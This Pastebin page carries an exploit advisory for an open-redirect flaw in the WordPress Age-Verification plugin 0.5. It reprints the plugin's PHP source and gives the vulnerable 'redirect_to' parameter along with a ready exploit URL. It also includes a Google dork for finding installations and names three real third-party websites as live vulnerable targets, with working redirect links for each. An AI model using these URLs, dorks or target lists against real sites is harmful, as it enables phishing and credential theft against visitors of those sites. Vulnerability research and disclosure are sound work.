API tools faq
paste
Advertisement
KingSkrupellos

WordPress 5.0.4 Age-Verification Plugins 0.5 Open Redirect

KingSkrupellos
Mar 21st, 2019
165
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.98 KB | None | 0 0
raw download clone embed print report
  1. ############################################################################################
  2.  
  3. # Exploit Title : WordPress 5.0.4 Age-Verification Plugins 0.5 Open Redirection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 21/03/2019
  7. # Vendor Homepages : coveredweb.com - coveredwebservices.com
  8. # Software Download Link : downloads.wordpress.org/plugin/age-verification.zip
  9. # Software Information Link :
  10. wordpress.org/plugins/tags/age-verification/
  11. txfx.net/wordpress-plugins/
  12. profiles.wordpress.org/markjaquith/
  13. # Software Affected Versions :
  14. WordPress Version 4.9.10 - 5.0.4 and lower versions - Plugin Version 0.5 - 0.4 is vulnerable
  15. Required at least WordPress 3.3.1 and 3.2 and higher
  16. # Tested On : Windows and Linux
  17. # Category : WebApps
  18. # Exploit Risk : Medium
  19. # Google Dorks : inurl:/wp-content/plugins/age-verification/
  20. # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  21. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  22. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  23. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  24. # Reference Link : cxsecurity.com/issue/WLB-2019030183
  25.  
  26. ############################################################################################
  27.  
  28. # Information About Software :
  29. ****************************
  30. Requires users to provide their date of birth before they can access your site.
  31.  
  32. This plugin forces users to provide their date of birth before they can access your site.
  33.  
  34. Their age must meet some configurable age.
  35.  
  36. Their age will be remembered in a cookie that will last for a configurable duration.
  37.  
  38. Plain text fields or dropdown fields can be configured. The interface is bare -- it is expected that you will do some work
  39.  
  40. to integrate this into your site's design. You can also exclude registered users
  41.  
  42. from the name check (for instance, so authors aren't subjected to it).
  43.  
  44. ############################################################################################
  45.  
  46. # Impact :
  47. ***********
  48. This web application WordPress 5.0.4 Age-Verification Plugins 0.5 and 0.4 versions accepts a user-controlled input that
  49.  
  50. specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.
  51.  
  52. An http parameter may contain a URL value and could cause the web application to redirect the request to the
  53.  
  54. specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam
  55.  
  56. and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts
  57.  
  58. have a more trustworthy appearance. Open redirect is a failure in that process that makes it possible for attackers
  59.  
  60. to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious
  61.  
  62. sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name
  63.  
  64. has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes
  65.  
  66. affected by malware the task of which is to deceive the valid actor and steal his personal data.
  67.  
  68. ############################################################################################
  69.  
  70. # Vulnerable Source Code : [ age-verification.php ]
  71. *********************************************
  72. <?php
  73. /*
  74. Plugin Name: Age Verification
  75. Description: Verifies a visitor's age before any pages can be viewed
  76. Version: 0.5
  77. Author: Mark Jaquith
  78. Author URI: http://coveredwebservices.com/
  79. */
  80.  
  81. /*
  82. Copyright 2008-2012 Mark Jaquith
  83.  
  84. This program is free software; you can redistribute it and/or modify
  85. it under the terms of the GNU General Public License as published by
  86. the Free Software Foundation; either version 2 of the License, or
  87. (at your option) any later version.
  88.  
  89. This program is distributed in the hope that it will be useful,
  90. but WITHOUT ANY WARRANTY; without even the implied warranty of
  91. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  92. GNU General Public License for more details.
  93.  
  94. You should have received a copy of the GNU General Public License
  95. along with this program; if not, write to the Free Software
  96. Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
  97. */
  98.  
  99. if ( !defined( 'ABSPATH' ) ) { // we're being called directly, for age verification
  100.  
  101. if ( file_exists('../../wp-config.php') )
  102. include('../../wp-config.php');
  103. elseif ( file_exists('../../../wp-config.php') )
  104. include('../../../wp-config.php');
  105. else
  106. die('Could not find wp-config.php');
  107.  
  108. if ( $_POST ) {
  109. foreach ( array( 'year', 'month', 'day' ) as $unit )
  110. $_POST['age_' . $unit] = absint( ltrim( $_POST['age_' . $unit], '0' ) );
  111. if (
  112. $_POST['age_year'] < 1900 ||
  113. $_POST['age_month'] < 1 ||
  114. $_POST['age_month'] > 12 ||
  115. $_POST['age_day'] < 1 ||
  116. $_POST['age_day'] > 31
  117. ) {
  118. wp_redirect( cws_age_verification::plugin_url() . '?wrongformat=1&redirect_to=' . urlencode( stripslashes( $_POST['redirect_to'] ) ) );
  119. die();
  120. }
  121. $dob = $_POST['age_year'] . '-' . zeroise( $_POST['age_month'], 2 ) . '-' . zeroise( $_POST['age_day'], 2 );
  122. cws_age_verification::set_dob($dob);
  123. wp_safe_redirect( $_POST['redirect_to'] );
  124. die();
  125. } else { ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  126. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  127. <html>
  128. <head>
  129. <title>Age Verification Required</title>
  130. </head>
  131. <body>
  132. <h1>Age Verification Required</h1>
  133. <?php if ( !$_COOKIE['cws_age_verification_cookie_check'] ) : ?>
  134. <p>This site requires your date of birth, but your browser isn't accepting cookies. Please enable cookies and try visiting this site again.</p>
  135. <?php cws_age_verification::footer(); ?>
  136. <?php endif; ?>
  137. <?php if ( $_GET['notoldenough'] ) : ?>
  138. <p><strong>You are not old enough to access this site!</strong></p>
  139. <?php elseif ( $_GET['wrongformat'] ) : ?>
  140. <p><strong>Your date of birth must be in the format <code>MM DD YYYY</code> and must be a valid date!</strong></p>
  141. <?php endif; ?>
  142. <p>You must be <?php echo cws_age_verification::age_required(); ?> years old to access this site. Please provide your date of birth:</p>
  143. <form action="" method="post">
  144. <input type="hidden" name="redirect_to" value="<?php echo clean_url( stripslashes( $_REQUEST['redirect_to'] ) ); ?>" />
  145. <?php if ( get_option( 'cws_age_verification_use_dropdowns ' ) ) : ?>
  146. <select name="age_month">
  147. <?php
  148. for ( $i=1; $i<13; $i++ )
  149. echo '<option value="' . $i . '">' . gmdate( 'F', gmmktime( 0, 0, 0, $i, 1, 0 ) ) . '</option>';
  150. ?>
  151. </select>
  152. <select name="age_day">
  153. <?php
  154. for ( $i=1; $i<32; $i++ )
  155. echo '<option value="' . zeroise( $i, 2 ) . '">' . zeroise( $i, 2 ) . '</option>';
  156. ?>
  157. </select>
  158. <select name="age_year">
  159. <?php
  160. for ( $i = date('Y'); $i > date('Y') - 110; $i-- )
  161. echo '<option value="' . $i . '">' . $i . '</option>';
  162. ?>
  163. </select>
  164. <?php else : // plain text inputs ?>
  165. <input name="age_month" type="text" maxlength="2" value="MM" onfocus="this.value='';" style="width: 2em;" />
  166. <input name="age_day" type="text" maxlength="2" value="DD" onfocus="this.value='';" style="width: 2em;" />
  167. <input name="age_year" type="text" maxlength="4" value="YYYY" onfocus="this.value='';" style="width: 4em;" />
  168. <?php endif; ?>
  169. <input type="submit" value="Verify Age &raquo;" />
  170. </form>
  171. <?php
  172. cws_age_verification::footer();
  173. }
  174. }
  175.  
  176. class cws_age_verification {
  177.  
  178. function footer() {
  179. echo "</body></html>";
  180. die();
  181. }
  182.  
  183. function check() {
  184. if ( current_user_can( 'read' ) && get_option( 'cws_age_verification_skip_registered' ) ) {
  185. // nothing -- let them pass
  186. } elseif ( !$_COOKIE['cws_age_verification_dob'] ) {
  187. cws_age_verification::set_test();
  188. wp_redirect( cws_age_verification::plugin_url() . '?redirect_to=http://' . $_SERVER['HTTP_HOST'] . urlencode($_SERVER['REQUEST_URI'] ) );
  189. die();
  190. } elseif ( cws_age_verification::age_required() > cws_age_verification::dob_to_age( $_COOKIE['cws_age_verification_dob'] ) ) {
  191. cws_age_verification::set_test();
  192. wp_redirect( cws_age_verification::plugin_url() . '?notoldenough=1&redirect_to=http://' . $_SERVER['HTTP_HOST'] . urlencode($_SERVER['REQUEST_URI'] ) );
  193. die();
  194. } else {
  195. cws_age_verification::set_dob( $_COOKIE['cws_age_verification_dob'] ); // keep-alive
  196. }
  197. }
  198.  
  199. function plugin_url() {
  200. return get_option( 'siteurl' ) . '/' . PLUGINDIR . '/' . plugin_basename( __FILE__ );
  201. }
  202.  
  203. function age_required() {
  204. return absint( get_option( 'cws_age_verification_age' ) );
  205. }
  206.  
  207. function timeout_minutes() {
  208. return absint( get_option( 'cws_age_verification_timeout' ) );
  209.  
  210. }
  211.  
  212. function timeout_seconds() {
  213. return 60 * cws_age_verification::timeout_minutes();
  214. }
  215.  
  216. function set_test() {
  217. setcookie( 'cws_age_verification_cookie_check', '1', time() + 3600, COOKIEPATH, COOKIE_DOMAIN );
  218. setcookie( 'cws_age_verification_cookie_check', '1', time() + 3600, SITECOOKIEPATH, COOKIE_DOMAIN );
  219. }
  220.  
  221. function set_dob( $dob ) {
  222. setcookie( 'cws_age_verification_dob', $dob, time() + cws_age_verification::timeout_seconds(), COOKIEPATH, COOKIE_DOMAIN );
  223. setcookie( 'cws_age_verification_dob', $dob, time() + cws_age_verification::timeout_seconds(), SITECOOKIEPATH, COOKIE_DOMAIN );
  224. }
  225.  
  226. function dob_to_age( $birthdate ) {
  227. // birthdate should be in yyyy-mm-dd form
  228. if ( $birthdate ) {
  229. $birth = date( 'Ymd', strtotime( $birthdate ) );
  230. $age = date( 'Y' ) - substr( $birth, 0, 4 );
  231. if ( date( 'md' ) < substr( $birth, 4, 4 ) )
  232. --$age;
  233. return $age;
  234. }
  235. }
  236.  
  237. function admin() {
  238. if ( !empty( $_POST ) ) {
  239. if ( function_exists( 'current_user_can' ) && !current_user_can( 'manage_options' ) )
  240. die( __( 'Cheatin&#8217; uh?' ) );
  241. check_admin_referer( 'cws-age-verification-update-settings' );
  242. update_option( 'cws_age_verification_age', absint( $_POST['cws-age-setting'] ) );
  243. update_option( 'cws_age_verification_timeout', absint( $_POST['cws-timeout-setting'] ) );
  244. update_option( 'cws_age_verification_skip_registered', ( $_POST['cws-registered-setting'] ) ? '1' : '0' );
  245. update_option( 'cws_age_verification_use_dropdowns', ( $_POST['cws-dropdown-setting'] ) ? '1' : '0' );
  246. }
  247. if ( !empty($_POST ) ) { ?>
  248. <div id="message" class="updated fade"><p><strong><?php _e( 'Options saved.' ) ?></strong></p></div>
  249. <?php } ?>
  250. <div class="wrap">
  251. <h2>Age Verification Settings</h2>
  252. <form action="" method="post" id="age-verification-settings">
  253. <?php wp_nonce_field( 'cws-age-verification-update-settings' ); ?>
  254. <p>Users must be at least <input style="width:2em;" type="text" name="cws-age-setting" value="<?php echo attribute_escape( cws_age_verification::age_required() ); ?>" maxlength="2" /> years old to access this site, and will have to reverify their age after <input style="width:4em;" type="text" name="cws-timeout-setting" value="<?php echo attribute_escape( cws_age_verification::timeout_minutes() ); ?>" maxlength="4" /> minutes of inactivity.</p>
  255. <p><input type="checkbox" <?php checked( get_option( 'cws_age_verification_skip_registered' ), '1' ); ?> value="1" name="cws-registered-setting" id="cws-registered-setting" /> <label for="cws-registered-setting">Logged in users of this site do not have to verify their age.</label></p>
  256. <p>Age verification should use <select name="cws-dropdown-setting"><option value="1" <?php selected( get_option( 'cws_age_verification_use_dropdowns' ), '1' ); ?>>dropdown</option><option value="0" <?php selected( get_option( 'cws_age_verification_use_dropdowns' ), '0' ); ?>>plain text</option></select> inputs.</p>
  257. <p class="submit"><input type="submit" value="Save options &raquo;" /></p>
  258. </form>
  259. </div>
  260. <?php
  261. }
  262.  
  263. }
  264.  
  265. function cws_age_verification_admin() {
  266. add_option( 'cws_age_verification_age', '13' ); // default to 13 because of COPPA
  267. add_option( 'cws_age_verification_timeout', '60' ); // one hour
  268. add_option( 'cws_age_verification_skip_registered', '1' );
  269. add_option( 'cws_age_verification_use_dropdowns', '1' );
  270. if ( function_exists( 'add_submenu_page' ) )
  271. add_submenu_page( 'plugins.php', 'Age Verification', 'Age Verification Settings', 'manage_options', 'age-verification', array( 'cws_age_verification', 'admin' ) );
  272. }
  273.  
  274. add_action( 'init', create_function( '$a', "add_action( 'admin_menu', 'cws_age_verification_admin' );" ) );
  275. add_action( 'template_redirect', array( 'cws_age_verification', 'check' ) );
  276.  
  277. ?>
  278.  
  279. ############################################################################################
  280.  
  281. # Vulnerable File :
  282. ****************
  283. /age-verification.php
  284.  
  285. # Vulnerable Parameter :
  286. **********************
  287. ?redirect_to=
  288.  
  289. ?notoldenough=1&redirect_to=
  290.  
  291. # Choose =>
  292. ************
  293. Day 1 - Month 1 - Year 1900
  294.  
  295. or you can choose any numbers and it will redirect to your desired website address.
  296.  
  297. # Open Redirection Exploit :
  298. ***************************
  299. /wp-content/plugins/age-verification/age-verification.php?redirect_to=https://www.[REDIRECTION-ADDRESS].gov
  300.  
  301. ############################################################################################
  302.  
  303. # Example Vulnerable Sites :
  304. *************************
  305. [+] paulanerhpusa.com/paulanerhpusa_wp/wp-content/plugins/age-verification/age-verification.php?redirect_to=https://cxsecurity.com/
  306.  
  307. [+] siebrand.nl/wp-content/plugins/age-verification/age-verification.php?notoldenough=1&redirect_to=https://cxsecurity.com/
  308.  
  309. [+] reggiani.ind.br/wp-content/plugins/age-verification/age-verification.php?notoldenough=1&redirect_to=https://cxsecurity.com/
  310.  
  311. ############################################################################################
  312.  
  313. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  314.  
  315. ############################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!